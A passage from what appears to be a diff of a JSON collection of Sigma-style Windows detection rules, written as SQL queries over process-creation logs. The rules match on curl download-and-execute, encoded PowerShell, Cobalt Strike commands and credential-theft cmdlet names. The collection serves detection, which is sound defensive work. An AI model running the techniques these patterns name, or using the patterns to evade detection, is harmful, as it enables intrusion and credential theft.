"attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + "filename": "proc_creation_win_sysprep_appdata.yml" }, { - "title": "Use of Wfc.exe", - "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "title": "Replace.exe Usage", + "id": "9292293b-8496-4715-9db6-37028dcda4b3", "status": "experimental", - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate use by a software developer" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" 
], - "filename": "proc_creation_win_lolbin_wfc.yml" + "filename": "proc_creation_win_lolbin_replace.yml" }, { - "title": "REGISTER_APP.VBS Proxy Execution", - "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", - "status": "experimental", - "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", + "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", + "status": "test", + "description": "dotnet.exe will execute any DLL and execute unsigned code", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_register_app.yml" + "filename": "proc_creation_win_lolbin_dotnet.yml" + }, + { + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). 
As seen used by Sarwent Malware", + "author": "Sander Wiebing", + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "falsepositives": [ + "Legitimate administration activity" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + }, + { + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "status": "test", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Obfuscated IP Via CLI", - "id": 
"56d19cb4-6414-4769-9644-1ed35ffbb148", + "title": "Service Started/Stopped Via Wmic.EXE", + "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", "status": "experimental", - "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "description": "Detects usage of wmic to start or stop a service", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" + "filename": "proc_creation_win_wmic_service_manipulation.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "title": "Suspicious Execution From GUID Like Folder Names", + "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1528", - "attack.t1036.003" + "attack.defense_evasion", + "attack.t1027" 
], "falsepositives": [ - "Unknown" + "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((NewProcessName LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%}\\\\%' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. 
https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe 
download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "Stop Windows Service Via Net.EXE", + "id": "88872991-7445-4a22-90b2-a3adadb0e827", + "status": "experimental", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. 
Filter legitimate activity accordingly" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_net_stop_service.yml" }, { - "title": "SQL Client Tools PowerShell Session Detection", - "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.communitly", + "description": "Adversaries can use curl to download payloads remotely and execute them. 
Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + 
"attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth 
(Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Deleted Data Overwritten Via Cipher.EXE", + "id": "4b046706-5789-4673-b111-66f25fe99534", + "status": "experimental", + "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.impact", + "attack.t1485" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'CIPHER.EXE' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "status": "experimental", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Potential Recon Activity Using Wevtutil", - "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", "status": "experimental", - "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "description": "Detects Commandlet names from well-known PowerShell 
exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the utility by administrators to query the event log" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE 
'\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE 